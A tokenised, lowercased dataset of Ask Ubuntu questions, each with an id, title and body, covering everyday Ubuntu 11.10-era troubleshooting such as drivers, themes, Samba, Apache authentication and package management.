85753	do i need a [ myfiles ] header for each path entry ?	i want to share two folders on my ubuntu box for my w7 machine to use . i typed [ myfiles ] only once , then a separate block entry for each path . when i testparmed , only the last path was shown .
85758	i ca n't do `` sudo ''	let 's describe it from the beginning : i was planning to re-enable the password requirement in lightdm for security reasons . but , since my pc 's been sluggish these times , it fc 'd the password setup when i was entering and now i ca n't enter it even with combinatorics . i have followed the tips in the help page , but with all of them i have issues : i try to enter recovery mode ( so that i type passwd and my name and change it ) , but it is a black screen just like my boot screen ( because of nvidia graphic card compatibility issue ) , then i ca n't do anything i also tried the editting `` shadow '' file , but the guide talks about some commas that i just do n't see where they are supposed to be . i even tried deletting the keyring file like it 's said , but nothing happens ( except that i lose the other passwords ) so is there anything i can do to have my password back ? ( a bonus would be stopping all this sluggish , apps not responding , etc )
85759	how do i set a custom gnome shell theme permanently ?	each time i do a computer restart the gnome shell theme i have enabled before the restart gets reset to the 'default ' theme when i log in after a restart . the default theme is the black panel . is it possible to set the theme to stick to my custom theme ?
85763	how can i control the pan , tilt , lighting , and other features on a logitech quickcam orbit/sphere af webcam ?	when the logitech quickcam orbit/sphere af webcam is in use on windows , a little window pops up enabling pan , tilt , zoom , and lighting control . this applet works outside of the program currently capturing video . is there a similar , full featured control program available for linux ? i did find the cli uvcdynctrl and a simple python/tk gui program pyuvcdyncrtl.py , which wraps around it , but pyuvcdyncrtl.py ca n't control the dynamic lighting , zoom , or other features .
85766	how to use ssh with tor ?	how can i use an ssh client over tor in ubuntu 11.10 ? i already have tor running ( and successfully anonymizing http traffic ) .
85770	realtek rtl8188ce wireless not working on toshiba satelite l655-s5153	i have just upgraded to ubuntu 11.10 however my wireless is not working . i cant find a guide to fix this specifically for my toshiba satelite l655-s5153 . can someone please guide me step by step in how to find a simple solution to this as i am not tech savy by any means ? any help will be appreciated . i am using rtl8188ce 802.11b/g/n wifi adapter
85775	why is the output of echo $ ( ( i++ ) ) different than echo $ ( ( i=i+1 ) )	! # /bin/bash i=1 echo $ ( ( i++ ) ) i=1 echo $ ( ( ++i ) ) i=1 echo $ ( ( i=i+1 ) ) this is the output bash increment 1 2 2 i thought the expression i=i+1 was identical to i++ . is there a way to check if two expressions are equal to each other ?
85776	what is iommu and will it improve my vm performance ?	my motherboard 's chipset supports this feature iommu , i 've read ( but not really understand ) that it improves the vm performance by letting the vm make use of the actual physical hardware instead of the virtual hardware . does this really bring a performance improvement in the vm ? and if it does how can i make virtualbox benefit from that ? .
85780	unity launcher is missing	what happened to my dock in ubuntu ? 11.10 i logged out because compiz fusion icon wasnt working then when i logged on again my dock wasnt there on the left side ? ? ? and there is no logout thing on the bar on the top right . later i got online from the 'help from ubuntu online ' link then i tryed downloading google chrome which i should have . then it said that i was hacked by code or something ? ? ? ? ! ! ! help ! ! ! ! ! !
85781	`` wireless authentification '' appears even when wep key is saved	in ubuntu 11.10 dialog box `` wireless authentification requiered '' appears even when the wep key it 's alraedy saved in system . that appears when i lost wireless connection and the system retry to connect it 's annoying to click accept each time i 'm connecting to a network . what i need to do so that dialog box does not appear more ?
85785	my computer set my external hard disk as read-only after i upgraded it to 11.10	i have an hp compaq 6910p that i upgrade into 11.10 a month ago . it works nicely with only one disability so far . i ca n't change anything in my external hard disk . it is connected through a usb 3.0 . i can read it in my computer , but in the properties it said that the permission is read-only , and i ca n't change it . so i can only copy files from it . it sucks because i need to do a lot of things with it . help me please ...
85786	how do i change the colors of the ambiance & radiance themes ?	i am using ubuntu 11.10 and i wanted to change colors in ambiance/radiance themes , by default it has orange and i wanted to change it to blue , i tried using gnome-color-chooser , but it did n't work ? any other ideas ?
85788	ubuntu 11.10 with gnome shell does not logout properly	i am using ubuntu 11.10 and recently installed gnome shell over the unity interface . gnome was taken from the ubuntu software center . now , once logged into gnome shell , i am unable to logout from it when required . as in , when i select logout from the desktop , it shows a dark grey screen after 2 seconds and then this screen persists till eternity . no matter what key or action i do during this time , the screen persists , and i m forced to hard boot again . i did not face any issue during logging out from the unity . this is only with the gnome3 de . since i am new to ubuntu , i m finding it hard to resolve on my own . please let me know where to check , and what to correct , to resolve this logout issue . thanks !
85796	can not restore resized icons in home folder	i resized the icons in the home folder using home/edit/preferences/icon view defaults/default zoom level 66 % . this worked fine but when i wanted to put them back to 100 % it wont work . they are stuck at 66 % . similarly in home/documents i made the default zoom level 150 % . the changed and are now stuck at 150 % . i can change into list mode and back again ok but the icons are stuck at the selected sizes . how do i recover from this ?
85800	recommendations for development system running virtual machines	i searched but i have n't really found a good answer . i need to buy a new system in the next day or two and i do n't want to spend a ton of cash . this system will be a development box that will need to run vm 's . i am thinking 8 gb and about a tb of hd space . i would also like the motherboard to support v technology as well . what kind of system do you recommend ? if i could find something under $ 1k that would be great . any advice would be greatly appreciated .
85801	ttl ( tcp/ip time to live ) changing in ubuntu	i want to increase packages time to live in ubuntu . what exactly i want to do : photos and xmls in browser ( chrome ) are downloading for about a minute . i do n't want the connection to be broken in 20 seconds , but , for example 120 seconds .
85806	how to go between partitions in terminal	a very basic query which requires your kind guidance . if i am at command prompt in either dos or windows , i would use , ( if i am in c : drive ) d : to go to drive d. what is the equivalent in ubuntu terminal if i want to move around between partitions , from sda1 to sda2 for example ?
85810	how to install older version of ghostscript ?	this is second time i get segmentation fault error when i try to run ghostscript on any pdf file with pdfwrite first time it was my previous ubuntu 11.04 distro , which afterwards i completely remove ( not because of gs ) , format my drive etc , and then install 11.04 again i do n't know what could be the problem . i work with gs a lot , and now all of a sudden i start getting this errors on any file , like something went wrong with this package or some of it 's dependencies . i searched synaptic history if there maybe some recent update could cause gs crippling but there was nothing i reported problems in the past ( at least two times ) on gs launchpad branch , but no one even replied , and as a matter of fact no one ever replied to me on launchpad for any report i issue , so i thought to remove completely ghostscript and install some other version . at first i thought to add debian stable repository , and install better tested version , but it turned out that perhaps that 's not very good idea - adding debian repository in ubuntu . as i ca n't `` force '' synaptic to some previous gs version ( as there is only one it seems - problematic one ) i do n't know how to approach this problem and wanted to ask how to install previous version , 8.71 preferably , because that 's the last version in debian stable . update : i removed gs 9.01 ( and bunch of other packages on the way ) and followed boris ' advice , as i did n't know what else can i do . i installed : libgs8_8.71~dfsg2-9_i386.deb ghostscript_8.71~dfsg2-9_i386.deb and tested gs interpreter and all was working fine . now i wanted to put back all those packages removed by gs 9.01 removal , and i needed to first install ghostscript-x : ghostscript-x_8.71~dfsg2-9_i386.deb this is where problem begins : error : breaks existing package 'gsfonts ' that conflict : 'gs ' . but the '/home/zetah/gs/ghostscript-x_8.71~dfsg2-9_i386.deb ' provides it via : 'gs , gs-afpl , gs-esp , gs-gpl ' i did n't want to brake things so i removed just installed libgs8 and ghostscript and tried to remove gsfonts package ( which additionally removed abiword , gnumeric , .. ) and then install all again . but i found out that gsfonts is required by ghostscript and installed whenever ghostscript is installed ( so ever before being able to install ghostscript-x package ) . now after installing libgs8 and ghostscript , when i try to install ghostscript-x i get : error : breaks existing package 'ghostscript ' that conflict : 'gs ' . but the '/home/zetah/gs/ghostscript-x_8.71~dfsg2-9_i386.deb ' provides it via : 'gs , gs-afpl , gs-esp , gs-gpl' it 's exactly the same if i try with ubuntu 10.10 ghostscript 8.71 packages from launchpad
85813	how to enable bluetooth when there is no hardware switch	my laptop thinkpad edge e320 got out of standby with bluetooth and wireless disabled . wifi got enabled normally in unity but bluetooth says that `` bluetooth is disabled by hardware switch '' . there is no hw switch on my laptop . i tried : # echo 1 > /sys/devices/platform/thinkpad_acpi/bluetooth_enable bash : echo : write error : operation not permitted but as you see no results . fn-f9 , which is radio control , does not work . any help ?
85815	classic categories in unity 's dash ?	i have installed ubuntu 11.10 i would like to get the classic menu categories on the dash home is there a possibility to customize the home dash as i like it ?
85818	uname -m vs. arch	the binaries are all but identical : diff -u < ( hexdump -c /bin/uname ) < ( hexdump -c /usr/bin/arch ) -- - /dev/fd/63 2011-12-07 11:38:18.344027319 +0100 +++ /dev/fd/62 2011-12-07 11:38:18.344027319 +0100 @ @ -38,8 +38,8 @ @ 00000250 6f 2e 32 00 04 00 00 00 10 00 00 00 01 00 00 00 |o.2 ... ... ... ... .| 00000260 47 4e 55 00 00 00 00 00 02 00 00 00 06 00 00 00 |gnu ... ... ... ... .| 00000270 0f 00 00 00 04 00 00 00 14 00 00 00 03 00 00 00 | ... ... ... ... ... .| -00000280 47 4e 55 00 7a 96 5e a8 ad 05 ae 51 d7 26 8a fa |gnu.z.^ ... .q. & ..| -00000290 bd 1a a6 ca 5a b3 02 dc 25 00 00 00 2a 00 00 00 | ... .z ... % ... * ... | +00000280 47 4e 55 00 fd 70 a8 c1 df cc 73 cb 78 c6 a5 77 |gnu..p ... .s.x..w| +00000290 04 d1 36 af 91 e8 3f 7d 25 00 00 00 2a 00 00 00 |..6 ... ? } % ... * ... | 000002a0 18 00 00 00 19 00 00 00 22 00 00 00 00 00 00 00 | ... ... .. '' ... ... .| 000002b0 14 00 00 00 00 00 00 00 1b 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000002c0 26 00 00 00 28 00 00 00 0a 00 00 00 00 00 00 00 | & ... ( ... ... ... ..| @ @ -1315,10 +1315,10 @ @ 000060f0 3e 10 40 00 00 00 00 00 4e 10 40 00 00 00 00 00 | > . @ ... ..n . @ ... ..| 00006100 5e 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |^ . @ ... ... ... ... .| 00006110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| -00006120 01 00 00 00 00 00 00 00 00 41 40 00 00 00 00 00 | ... ... ... a @ ... ..| +00006120 02 00 00 00 00 00 00 00 00 41 40 00 00 00 00 00 | ... ... ... a @ ... ..| 00006130 40 61 60 00 00 00 00 00 01 00 00 00 00 00 00 00 | @ a` ... ... ... ... .| 00006140 00 01 00 00 00 00 00 00 20 62 60 00 00 00 00 00 | ... ... .. b` ... ..| -00006150 01 00 00 00 75 6e 61 6d 65 00 00 00 79 ac e0 1f | ... .uname ... y ... | +00006150 01 00 00 00 61 72 63 68 00 00 00 00 d2 34 36 6a | ... .arch ... ..46j| 00006160 00 2e 73 68 73 74 72 74 61 62 00 2e 69 6e 74 65 |..shstrtab..inte| 00006170 72 70 00 2e 6e 6f 74 65 2e 41 42 49 2d 74 61 67 |rp..note.abi-tag| 00006180 00 2e 6e 6f 74 65 2e 67 6e 75 2e 62 75 69 6c 64 |..note.gnu.build| this was discovered because of another q & a which mentioned the similarity in functionality . since these are essentially identical , why are there two of them ? why not just use a symlink ( especially since one is in /usr/bin ) ?
85822	show desktop/workspaces/active windows by hovering the mouse to any corner of the desktop	there is a way to show the `` desktop '' , `` all active windows '' and `` workspace switcher '' by just hovering ur mouse to the edges of the screen . one way this can be done is using `` ubuntu tweak '' .
85824	main menu opened on every session opening	on ubuntu 11.10 and gnome3 , every time i open a session the main menu 's window is open ( although it 's been closed before ) , but none of the other windows previously opened ( nautilus , firefox , etc ) . any idea to solve this please ?
85825	delete an accidental extra installation of ubuntu 11.10	i recently installed ubuntu 11.10 as a dual boot on my system , then when on windows i accidentally deleted the partition having ubuntu . the result - left with grub rescue screen on start up . i fixed that with another installation of ubuntu but now have 2 installations of ubuntu on my system , that 's both the old one and the new one , how do i remove one of them keeping only the win7 and one ubuntu in my system ?
85829	how to enable second screen ( hdmi )	i am new to linux and this forum . i hope you can help me to solve another linux mystery ... i have installed ubuntu 11.10 , selected additional drivers/activated second driver ( to utilisy unity ) . my gpu is nvidia gt330m ( laptop ) . in windows i often connect pc via hdmi and main display form lcd switches to display on tv ( sony z5500 ) . no problems at all . in linux - well ... its a nother hardware nightmare . heres what i did : 1 ) connected hdmi cable tv < > pc 2 ) turned on tv 3 ) run as sudo nvidia-settings 4 ) detect displays - tv found , unmarked and put in tvs settings x separate screen 5 ) apply and save to xconf file 6 ) reboot pc rebooted . unfortunately nothing has changed - tv does not detect any hdmi devices ( sources ) , nvidia settings show tv is there , but when i run display manager via system settings - only lcd display is being shown . how to change the display from lcd to tv ? here is my output of xconf file # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ allspice ) thu aug 11 20:54:45 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` sony avamp '' horizsync 14.0 - 70.0 vertrefresh 48.0 - 62.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` seiko/epson '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 330m '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 330m '' busid `` pci:1:0:0 '' screen 0 endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection update : i just managed to do something - i have resetted all settings , put seiko and sony to separate x window , saved , reboot , and then i have checked sources in tv again . of course no change so i enforced to show hdmi 1 ( cable is connected in ) and switched to it . now tv screen went white , when i clicked on it ( there was mouse pointer which looks like black x ) it turned black . no options , no tasbar , no nothing except black background and x pointer ) funny thing is when i hit ctrl+alt+1 ( change to 1st terminal ) output went to tv screen ! i could see login ? what the heck ? any advices ?
85833	installer does n't detect existing partition table/windows 7 partition	i am having this issue with 11.10 . ubiquity does n't detect the existing windows 7 partition and when i choose to manually partition the disk , i ca n't see any partition there . when i log into the live system and open disk utility , it shows my hdd partitions fine but ubiquity for some reason is unable to detect them . ca n't install 11.10 'cause of this issue : ( i tried installing 12.04 alpha 1 and the issue still persists . there 's already a bug [ link : http : //pad.lv/798285 ] report regarding the issue but it seems that the report has gone unnoticed . is there any way i can still be able to install ubuntu on this system . edit : here 's the output of sudo fdisk -lu ubuntu @ ubuntu : ~ $ sudo fdisk -lu warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x66daaff3 device boot start end blocks id system /dev/sda1 * 2048 212994047 106496000 7 hpfs/ntfs/exfat disk /dev/sdb : 988 mb , 988282880 bytes 31 heads , 61 sectors/track , 1020 cylinders , total 1930240 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d3ee9 device boot start end blocks id system /dev/sdb1 * 61 1928819 964379+ c w95 fat32 ( lba ) screenshot : disk utility can detect the ntfs partition but ubiquity does n't .
85834	how to verify in my ubuntu am i using opensource video codec 's or not ?	i am using h.264 video codec in my ubuntu for video editing . but how do i verify it is the opensource h.264 ? apt-get install x264 i applied , does it installs the free h.264 or commercial one ? . hints : http : //www.videolan.org/developers/x264.html
85838	how to open php files on eclipse pdt indigo	since i have downloaded and installed the eclipse pdt indigo , i want to make it opens automatically files with .php extension . before oneiric 's release , simply right clicking on any .php file , selecting the proprierties item , and entering `` open as '' tab , gives the possibility to set an custom application command-line to open the file , but now it does n't possible . because i downloaded the eclipse 's .tar.gz binaries and simply extracted to /usr/lib and created a symbolic link to /usr/bin , it does n't appear on the list of applications supported , and i ca n't set a custom command-line , only find online an other . so , i make a question : how do i make my eclipse pdt opens automatically php files ? tks for all .
85839	.deb equivalents to .rpm commands	i 'm used to rpm based systems , and there 's many commands i 'm not yet sure how to do with .deb packages . this is mostly for use with custom packages , i.e . not stuff apt-get installed . it 'd be great if someone could provide a translation of the commands here : ( by `` package file '' it 's meant to operate on a physical .rpm/.deb file ) feature rpm deb -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- view all installed packages rpm -qa view files in an installed package rpm -ql packagename view files in an package file rpm -qlp ./packagename.rpm view package info , installed package rpm -qi packagename ( 1 ) view package info , package file rpm -qip ./packagename.rpm ( 1 ) view pre/post install shell scripts rpm -q -- scripts packagename view changelog for a package file rpm -qp -- changelog ./packagename.rpm uninstall a package rpm -e packagename dpkg -r/dpkg -p install a package file rpm -ivh ./packagename.rpm dpkg -i upgrade a package from a file rpm -uvh ./packagename.rpm find which package owns a file rpm -qif /some/file.foo list dependencies of a package rpm -q -- requires packagename list dependencies of a package file rpm -qp -- requires ./packagename.rpm ( 1 ) see e.g . info output example here
85844	ubuntu software center proxy with password	the ubuntu pc is behind a proxy server that requires a password . on windows it automatically uses windows authentication ( e.g . with internet explorer ) , or enter it manually ( e.g . avast ) . i did a search but could not find a similar question to address this issue . i 'm already aware of the global network proxy preferences ( system > preferences > network proxy ) , but it only takes the proxy server and port . this is not a problem with firefox , because it prompts for the username and password . how do i make this work for ubuntu 's software center ? it only prompts me for my user password , but the ubuntu user is not a network user . error detail : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 407 proxy authentication required ( the isa server requires authorization to fulfill the request . access to the web proxy filter is denied. ) i 'm using ubuntu 10.10 , and my linux skills are somewhat rusty . edit : ddk 's answer seems like what i 'm looking for , but i can not seem to get cntlm to work correctly . i followed the configuration steps he provided , and i updated to global network proxy to localhost : < listen_port > and removed my username and password ( under detail ) . the test command sudo cntlm -m http : //google.com/ passed , but when i test it with firefox cntlm fails with the error `` 502 parent proxy unreachable . '' edit fixed : it worked after i rebooted . the restart command invoke-rc.d cntlm restart does not restart , so the config file is never read .
85846	screen brightness not changing on a packard bell tx86	i 'm currently running ubuntu 11.10 on my packard bell tx86 when i try and use the fn key to change brightness , the icon thing appears in the top corner of the screen and the bar increases/decreases in size but nothing happens . the same happens when i try to change it in system preferences . anyone know how i could fix this ?
85847	how do i recover data from a partition i resized with gparted ?	i have an external hard disk with two partitions . i wanted to merge the two partitions with gparted . so i followed the procedure : i saved the data on partition a. i deleted partition a. i extended the size of partition b to the whole drive . so far so good , but when i re-opened my drive all the data on partition b was gone ! is there any way to recover it ?
85850	how to remap a key combination to a single key ?	i 'm using ubuntu on a samsung chromebook . as some of you may know , the keyboard used in chromeos based netbooks is a bit awkward : amongst other things , it does n't have a del key* . if i were going to use this netbook to its original purpose , browsing , i guess it would n't be a problem , but i need to program with it , and i miss a lot of keys , specially the delete one , but also page up , page down , home and end . so i 've been looking for a way to remap alt+backspace to page up , alt+left arrow to home , alt+down to page down , and so on ... i have found a lot of explanations on how to remap one key , but i do n't know how i can remap a key combination to a single key . has anyone tried to do something like this ? thanks a lot . *i mean , the key that deletes a character to the right . we call it `` supr '' in spain , i am not sure how it 's in english-speaking countries .
85852	apache2 digest authentication	here is my site file on ubuntu server 11.10 : < ifmodule mod_ssl.c > < virtualhost *:443 > serveradmin webmaster @ localhost documentroot /var/www/mydir serveralias *.mydomain.no-ip.info < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/mydir > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /ssl_access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > # ssl engine switch : # enable/disable ssl for this virtual host . sslengine on # a self-signed ( snakeoil ) certificate can be created by installing # the ssl-cert package . see # /usr/share/doc/apache2.2-common/readme.debian.gz for more info . # if both key and certificate are stored in the same file , only the # sslcertificatefile directive is needed . sslcertificatefile /etc/ssl/certs/ssl-cert-snakeoil.pem sslcertificatekeyfile /etc/ssl/private/ssl-cert-snakeoil.key < /virtualhost > < /ifmodule > now i wanted authorized access to directory : /var/www/mydir/private i created the digest file like this : sudo htdigest -c /etc/apache2/digest_auth users enedene so i added the following before the < \virtualhost > : < directory `` /var/www/mydir/private/ '' > authtype digest authname `` private '' authdigestprovider file authuserfile /etc/apache2/digest_auth require enedene < /directory > i restarted the web server and when i go to link : https : //mydomain.no-ip.info/private i get prompted with a username and password as i wanted , but the problem is that it does n't except the user/password that i 've created , it just continuously denies and prompts again , as if the username/password combination is wrong . what is wrong with my setup ? edit : here is what /var/log/apache2/error.log says : [ wed dec 07 18:00:47 2011 ] [ error ] [ client 188.129.120.255 ] file does not exist : /var/www/mydir/favicon.ico [ wed dec 07 18:01:07 2011 ] [ error ] [ client 188.129.120.255 ] digest : user `enedene ' in realm `private ' not found : /private the first line is when i connect to site , but the site works , the second line is when i try to access the /var/www/mydir/private dir , authentication comes to browser but i ca n't get in . edit 2 : after changing authname to `` users '' new error : [ wed dec 07 18:07:59 2011 ] [ error ] [ client 188.129.120.255 ] access to /private failed , reason : require directives present and no authoritative handler .
85858	how can i restore lost files in /etc ?	i have accidentally removed /etc/ folder . now there is no way to do any administration , because /etc/passwd and /etc/shadow are lost . is there any way to restore it in ubuntu ?
85865	how to remove vlc nightly build ?	i would like to remove the vlc nightly build and go back to the default vlc player . i tried sudo apt-get remove vlc which removed it , then i deleted the nightly ppa and tried to install vlc sudo apt-get install vlc but could n't as i got a few errors . there must a proper method , please let me know .
85868	has anyone deployed swift in an openstack environment using juju ?	i 've been reading up on how to deploy an openstack environment on some ubuntu servers ... i found some info on deploying and configuring it manually and i found some info on deploying it using orchestra for provisioning server hardware and juju for installing openstack nodes . the manual install instructions included steps for installing and configuring swift as part of the openstack environment , but neither the orchestra/juju instructions in section 2.2 here nor the instructions on slide 41 here include anything about swift . has anyone attempted to include swift when deploying openstack with orchestra and juju ? charms for swift do seem to exist ( swift , swift-proxy , swift-storage ) , but i ca n't seem to find any documentation on how to use them ...
85871	not able to run unity-2d interface in ubuntu 11.10	i 'm not able to use unity-2d in my computer running ubuntu 11.10 . unity 3d works hassle-free . when i type unity-2d-panel in terminal , i get the following in terminal and an error pops out and stops there . terminal output : ( unity-2d-panel:3106 ) : gdkpixbuf-warning * : bug ! gdk-pixbuf loader 'png ' did n't set an error on failure . ( unity-2d-panel:3106 ) : gtk-warning * : theme parsing error : gtk-widgets.css:1230:46 : failed to load image '/usr/share/themes/ambiance/gtk-3.0/assets/slider.png ' : reason not known , probably a corrupt image file ( unity-2d-panel:3106 ) : gdkpixbuf-warning * : bug ! gdk-pixbuf loader 'png ' did n't set an error on failure . ( unity-2d-panel:3106 ) : gtk-warning * : theme parsing error : gtk-widgets.css:1234:55 : failed to load image '/usr/share/themes/ambiance/gtk-3.0/assets/slider_prelight.png ' : reason not known , probably a corrupt image file ( unity-2d-panel:3106 ) : gdkpixbuf-warning * : bug ! gdk-pixbuf loader 'png ' did n't set an error on failure . ( unity-2d-panel:3106 ) : gtk-warning * : theme parsing error : gtk-widgets.css:1238:55 : failed to load image '/usr/share/themes/ambiance/gtk-3.0/assets/slider_vertical.png ' : reason not known , probably a corrupt image file ( unity-2d-panel:3106 ) : gdkpixbuf-warning * : bug ! gdk-pixbuf loader 'png ' did n't set an error on failure . ( unity-2d-panel:3106 ) : gtk-warning * : theme parsing error : gtk-widgets.css:1242:64 : failed to load image '/usr/share/themes/ambiance/gtk-3.0/assets/slider_prelight_vertical.png ' : reason not known , probably a corrupt image file ( unity-2d-panel:3106 ) : gdkpixbuf-warning * : bug ! gdk-pixbuf loader 'png ' did n't set an error on failure . ( unity-2d-panel:3106 ) : gtk-warning * : theme parsing error : gtk-widgets.css:1298:73 : failed to load image '/usr/share/themes/ambiance/gtk-3.0/assets/scrollbar_handle_vertical.png ' : reason not known , probably a corrupt image file ( unity-2d-panel:3106 ) : gdkpixbuf-warning * : bug ! gdk-pixbuf loader 'png ' did n't set an error on failure . ( unity-2d-panel:3106 ) : gtk-warning * : theme parsing error : gtk-widgets.css:1315:64 : failed to load image '/usr/share/themes/ambiance/gtk-3.0/assets/scrollbar_handle.png ' : reason not known , probably a corrupt image file unity-2d-panel : [ debug ] scanning panel plugin directory `` /usr/lib/unity-2d/plugins/panel '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-appindicator.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-appname.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-homebutton.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-indicator.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-legacytray.so '' unity-2d-panel : [ debug ] loading panel plugin : `` /usr/lib/unity-2d/plugins/panel/libpanelplugin-separator.so '' unity-2d-panel : symbol lookup error : /usr/lib/libdconf-qt.so.0 : undefined symbol : _znk15qdbusconnection15internalpointerev please help
85878	ubuntu mutes speaker every time i insert something in the phone jack	every time i insert something in my phone output jack , the sound is muted and i have to go into alsamixer and turn up the volume on the speaker lever . i can see the reason this is so - when i 'm listening in phones , i do n't want the laptop speakers on - but my hardware does this for me automatically , and the speaker lever goes to the phone jack when something is inserted there . the result of alsamixer doing this adjustment is that i have to open a terminal , type alsamixer , find the speaker lever and turn it up again , every time i insert something in the phone jack . there has to be a way to turn off this behavior . but how ?
85902	ubuntu one significantly slower than dropbox	i have tried many times to make the switch to ubuntu one but i never could because of it being significantly slower at uploading files than dropbox . i want the extra space and the integration with the desktop that it brings . does anyone know why u1 may be acting like this ?
85913	video drivers for onboard geforce 6150se	i 'm currently using the proprietary driver ( version current-updates ) . everything 's working okay , but if i try and watch a youtube video or movie in full screen the playback is extremely choppy . am i using the right drivers ? here is the output from sudo lshw -c video : foo @ bar : ~ $ sudo lshw -c video [ sudo ] password for foo : *-display description : vga compatible controller product : c61 [ geforce 6150se nforce 430 ] vendor : nvidia corporation physical id : d bus info : pci @ 0000:00:0d.0 version : a2 width : 64 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:22 memory : de000000-deffffff memory : c0000000-cfffffff memory : dd000000-ddffffff memory : dfd40000-dfd5ffff using firefox with the latest version of flash . it says the open source drivers are default , so i assume those are the one 's being used when i do n't have the proprietary drivers activated in `` additional drivers '' . but the problem is still there regardless .
85915	are gnome shell extensions compatible with unity ?	today i saw an article about extensions for gnome shell , so it got me thinking a couple of questions that may apply to many users in unity : will the gnome shell extensions be compatible with unity ? can i install them directly to unity from the https : //extensions.gnome.org/ website ? in case 2 is no , is there a similar idea for unity in the works ?
85918	what 's wrong with my ubuntu appearance	i do n't know what happened but my background become idle . so i want to change the background . right click on the desktop then click `` change desktop background '' but nothing happened . so i manually check the appearance setting . i noticed that it 's different from the usual one . my appearance setting window become the old one . mine : instead of : however i ca n't change the background . it 's just black , but when i change it into the purple background ( default background ) it becomes plain purple . can someone help me fix this ?
85929	drops to busybox , but can continue upon exiting	so i just installed 11.10 on my dell precision t5500 from the live cd . the live cd worked fine , but when i attempt to boot from hard drive i end up at the busybox prompt . however , if i simply type `` exit '' and enter it continues booting and i get the ubuntu graphical login screen . how do i fix things so i do n't stop at the busybox prompt ? i found an interesting similar problem at http : //samiux.wordpress.com/2008/12/16/howto-avoid-to-drop-to-busybox-in-ubuntu-810/ , but ca n't exactly implement the solution since the /boot/grub/menu.lst file does n't appear to exist in 11.10 . any ideas ? it would be nice to be able to reboot my system remotely .
85938	how do i download ubuntu one files to my mac ?	i have ubuntu one files on my phone uploaded to the website because i own a mac . i 'd like to download them all to said mac , how can i do that ? do i really have to download every single file one by one ?
